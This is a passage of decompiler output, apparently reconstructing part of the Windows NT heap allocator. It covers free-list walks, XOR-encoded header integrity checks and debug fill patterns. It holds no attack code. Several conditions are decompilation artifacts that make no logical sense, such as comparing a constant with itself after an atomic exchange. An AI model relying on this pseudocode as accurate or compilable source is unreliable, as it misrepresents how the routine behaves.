													 *_t1833 = _t1423;
													_t1464 = _v72;
													asm("bts eax, ebx");
													 *_t1464 =  *_t1464 & 0x000000ff;
													 *((intOrPtr*)(_t1771 + 0x23c)) =  *((intOrPtr*)(_t1771 + 0x23c)) + 1;
												}
											} else {
												__eflags = (_t1464 & 0x0000001f) - 0x10;
												if((_t1464 & 0x0000001f) > 0x10) {
													L44:
													_v188 = 1;
													goto L45;
												} else {
													__eflags = _t1464 - 0xff00;
													if(_t1464 > 0xff00) {
														goto L44;
													} else {
														_v188 = 0;
													}
												}
											}
										}
										_t1662 = _v40;
									}
								} else {
									__eflags = _t1413 -  *0x4da3928; // 0x4000
									if(__eflags <= 0) {
										__eflags =  *((char*)(_t1771 + 0xea)) - 2;
										if( *((char*)(_t1771 + 0xea)) != 2) {
											L36:
											__eflags =  *((char*)(_t1771 + 0xeb)) - 2;
											if( *((char*)(_t1771 + 0xeb)) == 2) {
												 *(_t1771 + 0x48) =  *(_t1771 + 0x48) | 0x20000000;
											}
										} else {
											__eflags =  *(_t1771 + 0xe4) - _t1441;
											if( *(_t1771 + 0xe4) == _t1441) {
												goto L36;
											}
										}
									}
								}
							}
							_t1793 = _a12;
							__eflags = _t1793;
							if(_t1793 == 0) {
								L95:
								_v204 = _t1771 + 0xc0;
								_t1794 =  *(_t1771 + 0xb4);
								_v44 = _t1794;
								while(1) {
									_t1482 = _t1794[1];
									__eflags = _t1662 - _t1482;
									if(_t1662 < _t1482) {
										break;
									}
									_t1052 =  *_t1794;
									__eflags = _t1052;
									if(_t1052 != 0) {
										_t1794 = _t1052;
										_v44 = _t1052;
										continue;
									} else {
										_t1053 = _t1482 - 1;
										L100:
										_v176 = _t1053;
									}
									L101:
									_v72 = _t1053;
									_v80 = _t1053 - _t1794[5];
									_v36 = 0;
									_t1670 = _t1794[6];
									_v96 = _t1670;
									_t1055 =  *((intOrPtr*)(_t1670 + 4));
									__eflags = _t1670 - _t1055;
									if(_t1670 != _t1055) {
										_t1056 = _t1055 + 0xfffffff8;
										_v32 = _t1056;
										_t1443 =  *_t1056;
										_v348 = _t1443;
										__eflags =  *(_t1771 + 0x4c);
										if( *(_t1771 + 0x4c) != 0) {
											_t1443 = _t1443 ^  *(_t1771 + 0x50);
											_v348 = _t1443;
											__eflags = _t1443 >> 0x18 - (_t1443 >> 0x00000010 ^ _t1443 >> 0x00000008 ^ _t1443);
											if(_t1443 >> 0x18 != (_t1443 >> 0x00000010 ^ _t1443 >> 0x00000008 ^ _t1443)) {
												E04D75FED(3, _t1771, _v32, 0, 0, 0);
												_t1670 = _v96;
											}
										}
										_t1484 = _v40 - (_t1443 & 0x0000ffff);
										_v276 = _t1484;
										__eflags = _t1484;
										if(_t1484 <= 0) {
											_t1059 =  *_t1670 + 0xfffffff8;
											_v32 = _t1059;
											_t1444 =  *_t1059;
											_v356 = _t1444;
											__eflags =  *(_t1771 + 0x4c);
											if( *(_t1771 + 0x4c) != 0) {
												_t1444 = _t1444 ^  *(_t1771 + 0x50);
												_v356 = _t1444;
												__eflags = _t1444 >> 0x18 - (_t1444 >> 0x00000010 ^ _t1444 >> 0x00000008 ^ _t1444);
												if(_t1444 >> 0x18 != (_t1444 >> 0x00000010 ^ _t1444 >> 0x00000008 ^ _t1444)) {
													E04D75FED(3, _t1771, _v32, 0, 0, 0);
													_t1670 = _v96;
												}
											}
											_t1486 = _v40 - (_t1444 & 0x0000ffff);
											_v280 = _t1486;
											__eflags = _t1486;
											if(_t1486 > 0) {
												__eflags =  *_t1794;
												if( *_t1794 != 0) {
													L127:
													_t1487 = _v80;
													_t1672 = _t1487 >> 5;
													_v32 = (_t1794[1] - _t1794[5] >> 5) - 1;
													_t1066 = _t1794[7] + _t1672 * 4;
													_t1447 = (_t1444 | 0xffffffff) << (_t1487 & 0x0000001f) &  *_t1066;
													__eflags = _t1447;
													_t1486 = _v32;
													while(1) {
														_v200 = _t1066;
														_v156 = _t1672;
														__eflags = _t1447;
														if(_t1447 != 0) {
															break;
														}
														__eflags = _t1672 - _t1486;
														if(_t1672 > _t1486) {
															__eflags = _t1447;
															if(_t1447 == 0) {
																L475:
																_t1794 =  *_t1794;
																_v44 = _t1794;
																_t1053 = _t1794[5];
																goto L100;
															} else {
																break;
															}
														} else {
															_t1066 =  &(_t1066[1]);
															_t1447 =  *_t1066;
															_t1672 = _t1672 + 1;
															continue;
														}
														goto L143;
													}
													__eflags = _t1447;
													if(_t1447 == 0) {
														_t1069 = _t1447 >> 0x00000010 & 0x000000ff;
														__eflags = _t1069;
														if(_t1069 == 0) {
															_t1071 = ( *((_t1447 >> 0x18) + 0x4c889b0) & 0x000000ff) + 0x18;
															__eflags = _t1071;
														} else {
															_t1071 = ( *(_t1069 + 0x4c889b0) & 0x000000ff) + 0x10;
														}
													} else {
														_t1356 = _t1447 & 0x000000ff;
														__eflags = _t1447;
														if(_t1447 == 0) {
															_t1071 = ( *((_t1447 >> 0x00000008 & 0x000000ff) + 0x4c889b0) & 0x000000ff) + 8;
														} else {
															_t1071 =  *(_t1356 + 0x4c889b0) & 0x000000ff;
														}
													}
													_t1674 = (_t1672 << 5) + _t1071;
													_v156 = _t1674;
													__eflags = _t1794[2];
													if(_t1794[2] != 0) {
														_t1674 = _t1674 + _t1674;
														__eflags = _t1674;
													}
													_t1073 =  *(_t1794[8] + _t1674 * 4);
													goto L142;
												} else {
													__eflags = _v72 - _t1794[1] - 1;
													if(_v72 != _t1794[1] - 1) {
														goto L127;
													} else {
														_t1486 = _v80;
														__eflags = _t1794[2];
														if(_t1794[2] != 0) {
															_t1486 = _t1486 + _t1486;
															__eflags = _t1486;
														}
														_t1825 =  *(_t1794[8] + _t1486 * 4);
														while(1) {
															__eflags = _t1670 - _t1825;
															if(_t1670 == _t1825) {
																break;
															}
															_t1752 = _t1825 - 8;
															_t1454 =  *(_t1825 - 8);
															_v364 = _t1454;
															__eflags =  *(_t1771 + 0x4c);
															if( *(_t1771 + 0x4c) != 0) {
																_t1454 = _t1454 ^  *(_t1771 + 0x50);
																_v364 = _t1454;
																__eflags = _t1454 >> 0x18 - (_t1454 >> 0x00000010 ^ _t1454 >> 0x00000008 ^ _t1454);
																if(_t1454 >> 0x18 != (_t1454 >> 0x00000010 ^ _t1454 >> 0x00000008 ^ _t1454)) {
																	E04D75FED(3, _t1771, _t1752, 0, 0, 0);
																}
															}
															_t1486 = _v40 - (_t1454 & 0x0000ffff);
															_v284 = _t1486;
															__eflags = _t1486;
															if(_t1486 > 0) {
																_t1825 =  *_t1825;
																_t1670 = _v96;
																continue;
															} else {
																_t1073 = _t1825;
																_t1794 = _v44;
																goto L142;
															}
															goto L143;
														}
														_t1073 = _v36;
														_t1794 = _v44;
													}
												}
											} else {
												_t1073 =  *_t1670;
												goto L142;
											}
										} else {
											_t1073 = _t1670;
											goto L142;
										}
									} else {
										_t1073 = _t1670;
										L142:
										_v36 = _t1073;
									}
									L143:
									__eflags = _t1073;
									if(_t1073 == 0) {
										goto L475;
									}
									_v288 = _t1073;
									__eflags = _v204 - _t1073;
									if(_v204 == _t1073) {
										L186:
										_t1441 = E04CC0445(_t1771, _a8);
										_v92 = _t1441;
										__eflags = _t1441;
										if(_t1441 == 0) {
											_v180 = 0xc0000017;
											L516:
											_v88 = 0;
										} else {
											_t350 = _t1441 + 8; // 0x8
											_t1795 = _t350;
											_t1495 =  *_t1795;
											_v32 = _t1495;
											_t1075 =  *(_t1441 + 0xc);
											_v48 = _t1075;
											_t1076 =  *_t1075;
											_t1496 =  *((intOrPtr*)(_t1495 + 4));
											__eflags = _t1076 - _t1496;
											if(_t1076 != _t1496) {
												L473:
												E04D75FED(0xd, _t1771, _t1795, _t1496, _t1076, 0);
												_v61 = 0;
											} else {
												__eflags = _t1076 - _t1795;
												if(_t1076 != _t1795) {
													goto L473;
												} else {
													 *(_t1771 + 0x74) =  *(_t1771 + 0x74) - ( *_t1441 & 0x0000ffff);
													_t1677 =  *(_t1771 + 0xb4);
													__eflags = _t1677;
													if(_t1677 != 0) {
														_t1605 =  *_t1441 & 0x0000ffff;
														while(1) {
															__eflags = _t1605 -  *((intOrPtr*)(_t1677 + 4));
															if(_t1605 <  *((intOrPtr*)(_t1677 + 4))) {
																break;
															}
															_t1321 =  *_t1677;
															__eflags = _t1321;
															if(_t1321 != 0) {
																_t1677 = _t1321;
																continue;
															} else {
																_t1605 =  *((intOrPtr*)(_t1677 + 4)) - 1;
																__eflags = _t1605;
															}
															break;
														}
														_v216 = _t1605;
														E04CC036A(_t1771, _t1677, 1, _t1795, _t1605,  *_t1441 & 0x0000ffff);
													}
													_t1079 = _v32;
													_t1498 = _v48;
													 *_t1498 = _t1079;
													 *(_t1079 + 4) = _t1498;
													__eflags =  *(_t1441 + 2) & 0x00000008;
													if(( *(_t1441 + 2) & 0x00000008) == 0) {
														L199:
														_v61 = 1;
														goto L200;
													} else {
														_t1316 = E04CAF5C7(_t1771, _t1441);
														__eflags = _t1316;
														if(_t1316 != 0) {
															goto L199;
														} else {
															E04CAF113(_t1771, _t1441,  *_t1441 & 0x0000ffff, 1);
															_v61 = 0;
														}
													}
												}
											}
										}
									} else {
										_t1441 = _t1073 - 8;
										_v92 = _t1441;
										__eflags =  *(_t1771 + 0x4c);
										if( *(_t1771 + 0x4c) != 0) {
											 *_t1441 =  *_t1441 ^  *(_t1771 + 0x50);
											__eflags =  *(_t1441 + 3) - ( *(_t1441 + 2) ^  *(_t1441 + 1) ^  *_t1441);
											if(__eflags != 0) {
												_push(_t1486);
												E04D6D646(_t1441, _t1771, _t1441, _t1771, _t1794, __eflags);
											}
											_t1073 = _v36;
										}
										_t1819 =  *_t1441 & 0x0000ffff;
										__eflags = _t1819 - _v40;
										if(_t1819 < _v40) {
											__eflags =  *(_t1771 + 0x4c);
											if( *(_t1771 + 0x4c) != 0) {
												 *(_t1441 + 3) =  *(_t1441 + 2) ^  *(_t1441 + 1) ^  *_t1441;
												 *_t1441 =  *_t1441 ^  *(_t1771 + 0x50);
												__eflags =  *_t1441;
											}
											goto L186;
										} else {
											_t1738 =  *(_t1441 + 8);
											_v128 = _t1738;
											_t1608 =  *(_t1441 + 0xc);
											_v144 = _t1608;
											_t1609 =  *_t1608;
											_t1739 =  *((intOrPtr*)(_t1738 + 4));
											__eflags = _t1609 - _t1739;
											if(_t1609 != _t1739) {
												L183:
												E04D75FED(0xd, _t1771, _t1073, _t1739, _t1609, 0);
												_v58 = 0;
											} else {
												__eflags = _t1609 - _t1073;
												if(_t1609 != _t1073) {
													goto L183;
												} else {
													 *(_t1771 + 0x74) =  *(_t1771 + 0x74) - _t1819;
													_t1611 =  *(_t1771 + 0xb4);
													_v44 = _t1611;
													__eflags = _t1611;
													if(_t1611 != 0) {
														_t1820 =  *_t1441 & 0x0000ffff;
														_v72 = _t1820;
														while(1) {
															_t1743 =  *(_t1611 + 4);
															__eflags = _t1820 - _t1743;
															if(_t1820 < _t1743) {
																break;
															}
															_t1349 =  *_t1611;
															__eflags = _t1349;
															if(_t1349 != 0) {
																_t1611 = _t1349;
																_v44 = _t1611;
																continue;
															} else {
																_t1820 = _t1743 - 1;
																_v72 = _t1820;
															}
															break;
														}
														_v208 = _t1820;
														_v108 =  *_t1441 & 0x0000ffff;
														_t1745 = _t1820 -  *((intOrPtr*)(_t1611 + 0x14));
														_v36 = _t1745;
														__eflags =  *(_t1611 + 8);
														_t1332 = _t1745 + _t1745;
														if( *(_t1611 + 8) == 0) {
															_t1332 = _t1745;
														}
														_t1774 = _t1332 * 4;
														_v80 = _t1774;
														_t1334 =  *((intOrPtr*)(_t1611 + 0x20)) + _t1774;
														_v96 = _t1334;
														_v32 =  *_t1334;
														 *((intOrPtr*)(_t1611 + 0xc)) =  *((intOrPtr*)(_t1611 + 0xc)) - 1;
														_t1336 =  *(_t1611 + 4);
														_t1775 = _t1336 - 1;
														_v48 = _t1775;
														__eflags = _t1820 - _t1775;
														_t1771 = _v124;
														if(_t1820 == _t1775) {
															_t293 = _t1611 + 0x10;
															 *_t293 =  *(_t1611 + 0x10) - 1;
															__eflags =  *_t293;
														}
														_t295 = _t1441 + 8; // 0xddeeddf6
														_t1821 = _t295;
														__eflags = _v32 - _t1821;
														if(_v32 == _t1821) {
															_v212 = _t1336;
															__eflags =  *_t1611;
															if( *_t1611 == 0) {
																_t1336 = _v48;
																_v212 = _t1336;
															}
															_t1822 =  *_t1821;
															_v32 =  *(_t1611 + 0x18);
															__eflags = _v72 - _t1336;
															_t1771 = _v124;
															if(_v72 >= _t1336) {
																_t1337 = _v96;
																__eflags = _t1822 - _v32;
																if(_t1822 == _v32) {
																	 *_t1337 = 0;
																	goto L177;
																} else {
																	 *_t1337 = _t1822;
																	goto L172;
																}
																goto L525;
															} else {
																__eflags = _t1822 -  *(_t1611 + 0x18);
																if(_t1822 ==  *(_t1611 + 0x18)) {
																	L176:
																	 *(_v80 +  *((intOrPtr*)(_t1611 + 0x20))) = 0;
																	L177:
																	_v36 = _t1745 & 0x0000001f;
																	_t333 = _v44 + 0x1c; // 0x0
																	 *( *_t333 + (_t1745 >> 5) * 4) =  *( *_t333 + (_t1745 >> 5) * 4) &  !(1 << _v36);
																} else {
																	_t1450 =  *(_t1822 - 8);
																	_v372 = _t1450;
																	__eflags =  *(_t1771 + 0x4c);
																	if( *(_t1771 + 0x4c) != 0) {
																		_t1450 = _t1450 ^  *(_t1771 + 0x50);
																		_v372 = _t1450;
																		__eflags = _t1450 >> 0x18 - (_t1450 >> 0x00000010 ^ _t1450 >> 0x00000008 ^ _t1450);
																		if(_t1450 >> 0x18 != (_t1450 >> 0x00000010 ^ _t1450 >> 0x00000008 ^ _t1450)) {
																			E04D75FED(3, _t1771, _t1822 - 8, 0, 0, 0);
																			_t1745 = _v36;
																		}
																		_t1611 = _v44;
																	}
																	_t1452 = _v108 - (_t1450 & 0x0000ffff);
																	__eflags = _t1452;
																	_v292 = _t1452;
																	if(_t1452 != 0) {
																		_t1441 = _v92;
																		goto L176;
																	} else {
																		_t315 = _t1611 + 0x20; // 0xffffffe4
																		 *(_v80 +  *_t315) = _t1822;
																		_t1441 = _v92;
																	}
																}
															}
														}
													}
													L172:
													_t1327 = _v128;
													_t1612 = _v144;
													 *_t1612 = _t1327;
													 *(_t1327 + 4) = _t1612;
													__eflags =  *(_t1441 + 2) & 0x00000008;
													if(( *(_t1441 + 2) & 0x00000008) == 0) {
														L182:
														_v58 = 1;
														goto L200;
													} else {
														_t1328 = E04CAF5C7(_t1771, _t1441);
														__eflags = _t1328;
														if(_t1328 != 0) {
															goto L182;
														} else {
															E04CAF113(_t1771, _t1441,  *_t1441 & 0x0000ffff, 1);
															_v58 = 0;
														}
													}
												}
											}
										}
									}
									goto L517;
								}
								_v176 = _t1662;
								_t1053 = _t1662;
								goto L101;
							} else {
								_t1826 =  *_t1793;
								__eflags = _t1826;
								if(_t1826 == 0) {
									goto L95;
								} else {
									_t1441 = _t1826 - 8;
									_v92 = _t1441;
									__eflags =  *(_t1771 + 0x4c);
									if( *(_t1771 + 0x4c) != 0) {
										 *_t1441 =  *_t1441 ^  *(_t1771 + 0x50);
										__eflags =  *(_t1441 + 3) - ( *(_t1441 + 2) ^  *(_t1441 + 1) ^  *_t1441);
										if(__eflags != 0) {
											_push(_t1464);
											E04D6D646(_t1441, _t1771, _t1441, _t1771, _t1826, __eflags);
										}
									}
									_t1635 =  *(_t1441 + 8);
									_v48 = _t1635;
									_t1378 =  *(_t1441 + 0xc);
									_v32 = _t1378;
									_t1379 =  *_t1378;
									_t1636 =  *((intOrPtr*)(_t1635 + 4));
									__eflags = _t1379 - _t1636;
									if(_t1379 != _t1636) {
										L93:
										E04D75FED(0xd, _t1771, _t1826, _t1636, _t1379, 0);
										goto L94;
									} else {
										__eflags = _t1379 - _t1826;
										if(_t1379 != _t1826) {
											goto L93;
										} else {
											 *(_t1771 + 0x74) =  *(_t1771 + 0x74) - ( *_t1441 & 0x0000ffff);
											_t1757 =  *(_t1771 + 0xb4);
											_v44 = _t1757;
											__eflags = _t1757;
											if(_t1757 != 0) {
												_t1828 =  *_t1441 & 0x0000ffff;
												_v72 = _t1828;
												while(1) {
													_t1641 =  *(_t1757 + 4);
													__eflags = _t1828 - _t1641;
													if(_t1828 < _t1641) {
														break;
													}
													_t1406 =  *_t1757;
													__eflags = _t1406;
													if(_t1406 != 0) {
														_t1757 = _t1406;
														_v44 = _t1757;
														continue;
													} else {
														_t1828 = _t1641 - 1;
														_v72 = _t1828;
													}
													break;
												}
												_v192 = _t1828;
												_v128 =  *_t1441 & 0x0000ffff;
												_t1643 = _t1828 -  *((intOrPtr*)(_t1757 + 0x14));
												_v108 = _t1643;
												__eflags =  *(_t1757 + 8);
												_t1389 = _t1643 + _t1643;
												if( *(_t1757 + 8) == 0) {
													_t1389 = _t1643;
												}
												_t1777 = _t1389 * 4;
												_v80 = _t1777;
												_t1391 =  *((intOrPtr*)(_t1757 + 0x20)) + _t1777;
												_v96 = _t1391;
												_v36 =  *_t1391;
												 *((intOrPtr*)(_t1757 + 0xc)) =  *((intOrPtr*)(_t1757 + 0xc)) - 1;
												_t1393 =  *(_t1757 + 4);
												_t1778 = _t1393 - 1;
												_v144 = _t1778;
												__eflags = _t1828 - _t1778;
												_t1771 = _v124;
												if(_t1828 == _t1778) {
													_t131 = _t1757 + 0x10;
													 *_t131 =  *(_t1757 + 0x10) - 1;
													__eflags =  *_t131;
												}
												_t133 = _t1441 + 8; // 0xddeeddf6
												_t1829 = _t133;
												__eflags = _v36 - _t1829;
												if(_v36 == _t1829) {
													_v196 = _t1393;
													__eflags =  *_t1757;
													if( *_t1757 == 0) {
														_t1393 = _v144;
														_v196 = _t1393;
													}
													_t1830 =  *_t1829;
													_v144 =  *(_t1757 + 0x18);
													__eflags = _v72 - _t1393;
													_t1771 = _v124;
													if(_v72 >= _t1393) {
														_t1394 = _v96;
														__eflags = _t1830 - _v144;
														if(_t1830 == _v144) {
															 *_t1394 = 0;
															goto L87;
														} else {
															 *_t1394 = _t1830;
															goto L82;
														}
														goto L525;
													} else {
														__eflags = _t1830 -  *(_t1757 + 0x18);
														if(_t1830 ==  *(_t1757 + 0x18)) {
															L86:
															 *(_v80 +  *((intOrPtr*)(_t1757 + 0x20))) = 0;
															L87:
															_t168 = _v44 + 0x1c; // 0x0
															 *( *_t168 + (_t1643 >> 5) * 4) =  *( *_t168 + (_t1643 >> 5) * 4) &  !(1 << (_t1643 & 0x0000001f));
														} else {
															_t1455 =  *(_t1830 - 8);
															_v340 = _t1455;
															__eflags =  *(_t1771 + 0x4c);
															if( *(_t1771 + 0x4c) != 0) {
																_t1455 = _t1455 ^  *(_t1771 + 0x50);
																_v340 = _t1455;
																__eflags = _t1455 >> 0x18 - (_t1455 >> 0x00000010 ^ _t1455 >> 0x00000008 ^ _t1455);
																if(_t1455 >> 0x18 != (_t1455 >> 0x00000010 ^ _t1455 >> 0x00000008 ^ _t1455)) {
																	E04D75FED(3, _t1771, _t1830 - 8, 0, 0, 0);
																	_t1757 = _v44;
																}
															}
															_t1646 = _v128 - (_t1455 & 0x0000ffff);
															__eflags = _t1646;
															_v268 = _t1646;
															if(_t1646 != 0) {
																_t1441 = _v92;
																_t1643 = _v108;
																goto L86;
															} else {
																_t152 = _t1757 + 0x20; // 0xffffffe4
																 *(_v80 +  *_t152) = _t1830;
																_t1441 = _v92;
															}
														}
													}
												}
											}
											L82:
											_t1384 = _v48;
											_t1638 = _v32;
											 *_t1638 = _t1384;
											 *(_t1384 + 4) = _t1638;
											__eflags =  *(_t1441 + 2) & 0x00000008;
											if(( *(_t1441 + 2) & 0x00000008) == 0) {
												L92:
												_v57 = 1;
												L200:
												_t1499 =  *(_t1441 + 2);
												_v59 = _t1499;
												_t1796 = _v116;
												__eflags = _t1796;
												if(_t1796 == 0) {
													__eflags = _t1499 & 0x00000004;
													if((_t1499 & 0x00000004) != 0) {
														_t1818 = ( *_t1441 & 0x0000ffff) * 8 - 0x10;
														_v220 = _t1818;
														__eflags = _t1499 & 0x00000002;
														if((_t1499 & 0x00000002) != 0) {
															__eflags = _t1818 - 4;
															if(_t1818 > 4) {
																_t1818 = _t1818 - 4;
																__eflags = _t1818;
																_v220 = _t1818;
															}
														}
														_t380 = _t1441 + 0x10; // 0x10
														_t1306 = E04D080A0(_t380, _t1818, 0xfeeefeee);
														_v32 = _t1306;
														__eflags = _t1306 - _t1818;
														if(_t1306 != _t1818) {
															_t1599 =  *[fs:0x30];
															__eflags =  *(_t1599 + 0xc);
															if( *(_t1599 + 0xc) == 0) {
																_push("HEAP: ");
																E04CAB910();
																_t1843 = _t1839 + 4;
															} else {
																E04CAB910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
																_t1843 = _t1839 + 8;
															}
															_push(_v32 + 0x10 + _v92);
															E04CAB910("HEAP: Free Heap block %p modified at %p after it was freed\n", _v92);
															_t1839 = _t1843 + 0xc;
															_t1312 =  *[fs:0x30];
															__eflags =  *((char*)(_t1312 + 2));
															if( *((char*)(_t1312 + 2)) == 0) {
																_t1441 = _v92;
															} else {
																 *0x4da47a1 = 1;
																_t1441 = _v92;
																 *0x4da4100 = _t1441;
																asm("int3");
																 *0x4da47a1 = 0;
															}
														}
														_t1796 = _v116;
													}
												}
												_v104 = _t1441;
												__eflags =  *(_t1441 + 2) & 0x00000001;
												if(( *(_t1441 + 2) & 0x00000001) == 0) {
													 *(_t1441 + 2) = _v56;
													_t1500 = _v40;
													_t1679 = ( *_t1441 & 0x0000ffff) - _t1500;
													_v80 = _t1679;
													_v296 = _t1679;
													_t1081 = _t1500 & 0x0000ffff;
													_v32 = _t1081;
													 *_t1441 = _t1081;
													_t1083 = _a8 - _a4;
													_v108 = _t1083;
													__eflags = _t1083 - 0x3f;
													if(_t1083 >= 0x3f) {
														 *(_t1441 + _t1500 * 8 - 4) = _t1083;
														 *(_t1441 + 7) = 0x3f;
													} else {
														 *(_t1441 + 7) = _t1083;
													}
													 *(_t1441 + 3) = 0;
													__eflags = _t1679;
													if(_t1679 == 0) {
														L222:
														_t1501 = _v104;
														_t1797 =  &(_t1501[4]);
														_v88 = _t1797;
														_t1680 = ( *_t1501 & 0x0000ffff) * 8;
														_v140 = _t1680;
														_t1085 =  &(_t1501[3]);
														_v32 = _t1085;
														__eflags = ( *_t1085 & 0x0000003f) - 0x3f;
														if(( *_t1085 & 0x0000003f) == 0x3f) {
															_t1680 = _t1680 + 0xfffffffc;
															__eflags = _t1680;
															_v140 = _t1680;
														}
														__eflags = _v116;
														if(_v116 == 0) {
															__eflags = _v120 & 0x00000008;
															if((_v120 & 0x00000008) == 0) {
																__eflags =  *(_t1771 + 0x40) & 0x00000040;
																if(( *(_t1771 + 0x40) & 0x00000040) == 0) {
																	goto L455;
																} else {
																	_t1449 = _a4;
																	E04D08140(_v88, _t1449 & 0xfffffffc, 0xbaadf00d);
																	goto L456;
																}
																goto L517;
															} else {
																E04CF8F40(_t1797, 0, _t1680 - 8);
																L455:
																_t1449 = _a4;
															}
															L456:
															__eflags =  *(_t1771 + 0x40) & 0x00000020;
															if(( *(_t1771 + 0x40) & 0x00000020) != 0) {
																 *((intOrPtr*)(_t1797 + _t1449)) = 0xabababab;
																 *((intOrPtr*)(_t1797 + _t1449 + 4)) = 0xabababab;
																_t1108 = _v104;
																_t845 = _t1108 + 2;
																 *_t845 =  *(_t1108 + 2) | 0x00000004;
																__eflags =  *_t845;
															}
															_t1502 = _v104;
															_t1441 = _t1502 + 3;
															 *_t1441 = 0;
															_t1088 = _t1502 + 2;
															_v48 = _t1088;
															__eflags =  *_t1088 & 0x00000002;
															if(( *_t1088 & 0x00000002) == 0) {
																_t1090 =  *( *[fs:0x30] + 0x68);
																_v324 = _t1090;
																__eflags = _t1090 & 0x00000800;
																if((_t1090 & 0x00000800) == 0) {
																	goto L470;
																} else {
																	_t1798 = _v104;
																	 *_t1441 = E04D59AFE(_t1771, _v120 >> 0x00000012 & 0x000000ff, 0,  *_t1798 & 0x0000ffff, 0);
																}
															} else {
																__eflags =  *_v32 - 4;
																if( *_v32 != 4) {
																	_t1505 = _v104;
																	_t1101 = ( *_t1505 & 0x0000ffff) - 1;
																	__eflags = _t1101;
																	_t1799 = _t1505 + _t1101 * 8;
																} else {
																	_t1799 = _t1502 - 0x10;
																}
																_t1102 = _t1799;
																_v172 = _t1799;
																 *_t1102 = 0;
																 *((intOrPtr*)(_t1102 + 4)) = 0;
																__eflags =  *(_t1771 + 0x40) & 0x08000000;
																if(( *(_t1771 + 0x40) & 0x08000000) != 0) {
																	 *_t1799 = E04CDFDB9(1, _t1680);
																}
																_t1104 =  *( *[fs:0x30] + 0x68);
																_v320 = _t1104;
																__eflags = _t1104 & 0x00000800;
																if((_t1104 & 0x00000800) == 0) {
																	L470:
																	_t1798 = _v104;
																} else {
																	_t1798 = _v104;
																	 *((short*)(_v172 + 2)) = E04D59AFE(_t1771, _v120 >> 0x00000012 & 0x00000fff, 0,  *_t1798 & 0x0000ffff, 0);
																}
															}
															__eflags =  *(_t1771 + 0x4c);
															if( *(_t1771 + 0x4c) != 0) {
																 *_t1441 = _t1798[0] ^  *_v48 ^  *_t1798;
																 *_t1798 =  *_t1798 ^  *(_t1771 + 0x50);
															}
														} else {
															__eflags =  *(_t1771 + 0x4c);
															if( *(_t1771 + 0x4c) != 0) {
																_t1518 = _v104;
																_t1518[0] = _t1518[0] ^ _t1518[0] ^  *_t1518;
																 *_t1518 =  *_t1518 ^  *(_t1771 + 0x50);
																__eflags =  *_t1518;
															}
															__eflags = _v49;
															if(_v49 != 0) {
																__eflags =  *(_t1771 + 0x44) & 0x01000000;
																if(( *(_t1771 + 0x44) & 0x01000000) == 0) {
																	 *(_t1771 + 0x22c) =  *(_t1771 + 0x22c) + 1;
																	_t1680 =  *(_t1771 + 0x234);
																	__eflags =  *(_t1771 + 0x22c) - _t1680;
																	if( *(_t1771 + 0x22c) > _t1680) {
																		 *(_t1771 + 0x22c) = 0;
																		_t1517 =  *((intOrPtr*)(_t1771 + 0x1f8)) - ( *(_t1771 + 0x74) << 3);
																		__eflags = _t1517 -  *((intOrPtr*)(_t1771 + 0x248));
																		if(_t1517 >  *((intOrPtr*)(_t1771 + 0x248))) {
																			 *((intOrPtr*)(_t1771 + 0x248)) = _t1517;
																		}
																		 *((intOrPtr*)(_t1771 + 0x24c)) = _t1517;
																	}
																	 *(_t1771 + 0x238) =  *(_t1771 + 0x238) + 1;
																	__eflags =  *(_t1771 + 0x238) - 0x1000;
																	if( *(_t1771 + 0x238) >= 0x1000) {
																		__eflags =  *((char*)(_t1771 + 0xea)) - 2;
																		if( *((char*)(_t1771 + 0xea)) != 2) {
																			L236:
																			_t1125 = 0x10;
																		} else {
																			__eflags =  *((intOrPtr*)(_t1771 + 0x23c)) - 0x10;
																			_t1125 = 0x100;
																			if( *((intOrPtr*)(_t1771 + 0x23c)) <= 0x10) {
																				goto L236;
																			}
																		}
																		__eflags =  *(_t1771 + 0x230) - _t1125;
																		if( *(_t1771 + 0x230) > _t1125) {
																			__eflags = _t1680 - 0x10000;
																			if(_t1680 < 0x10000) {
																				 *(_t1771 + 0x234) = _t1680 + _t1680;
																			}
																		}
																		 *(_t1771 + 0x230) = 0;
																		 *(_t1771 + 0x238) = 0;
																	}
																}
																_t1800 =  *((intOrPtr*)(_t1771 + 0xc8));
																_t452 = _t1800 + 8;
																 *_t452 =  *(_t1800 + 8) + 0xffffffff;
																__eflags =  *_t452;
																if( *_t452 == 0) {
																	 *(_t1800 + 0xc) = 0;
																	_t455 = _t1800 + 4; // 0x4
																	_t1510 = _t455;
																	asm("lock cmpxchg [ecx], edx");
																	_t1441 = 0xfffffffe;
																	__eflags = 0xfffffffe - 0xfffffffe;
																	if(0xfffffffe != 0xfffffffe) {
																		__eflags =  *_t1510 & 0x00000001;
																		if(( *_t1510 & 0x00000001) != 0) {
																			E04D4AA40(_t1800);
																		}
																		_t1118 =  *(_t1800 + 0x10);
																		_v72 = _t1118;
																		__eflags = _t1118;
																		if(_t1118 == 0) {
																			_v72 = E04CDFEC0(_t1800);
																		}
																		_v252 = 0;
																		while(1) {
																			_t1513 = _t1441 & 0x00000002 | 0x00000001;
																			asm("lock cmpxchg [edi], edx");
																			__eflags = _t1441 - _t1441;
																			_t1771 = _v124;
																			if(_t1441 == _t1441) {
																				break;
																			}
																			E04CDBAC0(_t1513,  &_v252);
																			_t1441 =  *(_t1800 + 4);
																		}
																		__eflags = _t1513 & 0x00000002;
																		if((_t1513 & 0x00000002) != 0) {
																			E04CDF300(_t1800, _v72);
																		}
																	}
																}
																_v49 = 0;
															}
															__eflags = _v120 & 0x00000008;
															if((_v120 & 0x00000008) != 0) {
																E04CF8F40(_v88, 0, _v140 + 0xfffffff8);
															}
														}
													} else {
														__eflags = _t1679 - 1;
														if(_t1679 != 1) {
															__eflags = _t1796;
															_t1134 = 0 | _t1796 == 0x00000000;
															_v44 = _t1134;
															_v184 = _t1134;
															_t1135 =  *(_t1441 + 6);
															__eflags = _t1135;
															if(_t1135 == 0) {
																_t1519 = _t1771;
																_t1801 = _t1771;
															} else {
																_t1519 = (1 - (_t1135 & 0x000000ff) << 0x10) + (_t1441 & 0xffff0000);
																_t1801 = 1;
															}
															_v224 = _t1519;
															_v48 = _t1679;
															_t1441 = _t1441 + _v40 * 8;
															_v72 = 0;
															 *(_t1441 + 2) = _v59;
															 *(_t1441 + 7) = 0;
															 *(_t1441 + 4) =  *(_t1771 + 0x54) ^ _v32;
															__eflags =  *((intOrPtr*)(_t1519 + 0x18)) - _t1801;
															if( *((intOrPtr*)(_t1519 + 0x18)) != _t1801) {
